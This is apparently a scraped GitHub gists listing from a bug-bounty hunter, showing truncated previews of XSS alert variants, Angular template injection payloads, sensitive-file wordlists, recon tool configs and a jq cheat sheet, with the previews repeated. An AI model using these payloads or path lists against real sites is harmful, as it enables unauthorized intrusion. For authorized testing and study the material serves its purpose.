Tarek bugpie54

## alert.js
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:

// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);

## short-wordlist.txt
/.s3cfg
/phpunit.xml
/nginx.conf
/.vimrc
/LICENSE.md
/yarn.lock
/Gulpfile
/Gulpfile.js
/composer.json
/.npmignore

## JavascriptRecon.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                bugpie54
                / JavascriptRecon.md
            
            
              Created
              February 2, 2021 06:04
            
              
                My Javascript Recon Process - BugBounty
              
          
    Description

This is a simple guide to perform javascript recon in the bugbounty
Steps


The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)


## Amass Config
# Copyright 2017-2020 Jeff Foley. All rights reserved.
# Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.

# Should results only be collected passively and without DNS resolution? Not recommended.
#mode = passive
mode = active

# The directory that stores the Cayley graph database and other output files
# The default for Linux systems is: $HOME/.config/amass
#output_directory = amass

## nucleir.sh
nucleir() {
	local TPL="$HOME/Documents/nuclei-templates"

	[[ -z "${1}" ]] && { echo "-target/-l ?"; return; }
	[[ -z "${2}" ]] && { echo "Input target?"; return; }

	local T=""

	for i in `ls -1d ${TPL}/*/`; do
		if [[ ! "${i}" =~ (brute-force|examples|payloads) ]]; then

## my.cnf
[client]
port    = 3306
socket  = /var/run/mysqld/mysqld.sock

# This was formally known as [safe_mysqld]. Both versions are currently parsed.
[mysqld_safe]
socket  = /var/run/mysqld/mysqld.sock
nice    = 0
syslog

## AngularTI.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                bugpie54
                / AngularTI.md
            
            
              Created
              March 12, 2021 11:19
                — forked from mccabe615/AngularTI.md
            
              
                Angular Template Injection Payloads
              
          
    1.3.2 and below

{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';


## all.txt

.
..
........
@
*
*.*
*.*.*
ðŸŽ

## google-dorks

"          _                      _          "
"   _     /||       .   .        ||\     _   "
"  ( }    \||D    '   '     '   C||/    { %  "
" | /\__,=_[_]   '  .   . '       [_]_=,__/\ |"
" |_\_  |----|                    |----|  _/_|"
" |  |/ |    |                    |    | \|  |"
" |  /_ |    |                    |    | _\  |"

	It is all fun and games until someone gets hacked!

## jq-cheetsheet.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                bugpie54
                / jq-cheetsheet.md
            
            
              Created
              July 31, 2021 18:51
                — forked from olih/jq-cheetsheet.md
            
              
                jq Cheet Sheet
              
          
    Processing JSON using jq

jq is useful to slice, filter, map and transform structured json data.
Installing jq

On Mac OS

brew install jq
	// How many ways can you alert(document.domain)?
	// Comment with more ways and I'll add them :)
	// I already know about the JSFuck way, but it's too long to add (:

	// Direct invocation
	alert(document.domain);
	(alert)(document.domain);
	al\u0065rt(document.domain);
	al\u{65}rt(document.domain);
	window['alert'](document.domain);
	/.s3cfg
	/phpunit.xml
	/nginx.conf
	/.vimrc
	/LICENSE.md
	/yarn.lock
	/Gulpfile
	/Gulpfile.js
	/composer.json
	/.npmignore
	# Copyright 2017-2020 Jeff Foley. All rights reserved.
	# Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.

	# Should results only be collected passively and without DNS resolution? Not recommended.
	#mode = passive
	mode = active

	# The directory that stores the Cayley graph database and other output files
	# The default for Linux systems is: $HOME/.config/amass
	#output_directory = amass
	nucleir() {
	local TPL="$HOME/Documents/nuclei-templates"

	[[ -z "${1}" ]] && { echo "-target/-l ?"; return; }
	[[ -z "${2}" ]] && { echo "Input target?"; return; }

	local T=""

	for i in `ls -1d ${TPL}/*/`; do
	if [[ ! "${i}" =~ (brute-force\|examples\|payloads) ]]; then
	[client]
	port = 3306
	socket = /var/run/mysqld/mysqld.sock

	# This was formally known as [safe_mysqld]. Both versions are currently parsed.
	[mysqld_safe]
	socket = /var/run/mysqld/mysqld.sock
	nice = 0
	syslog

	" _ _ "
	" _ /\|\| . . \|\|\ _ "
	" ( } \\|\|D ' ' ' C\|\|/ { % "
	" \| /\__,=_[_] ' . . ' [_]_=,__/\ \|"
	" \|_\_ \|----\| \|----\| _/_\|"
	" \| \|/ \| \| \| \| \\| \|"
	" \| /_ \| \| \| \| _\ \|"

	It is all fun and games until someone gets hacked!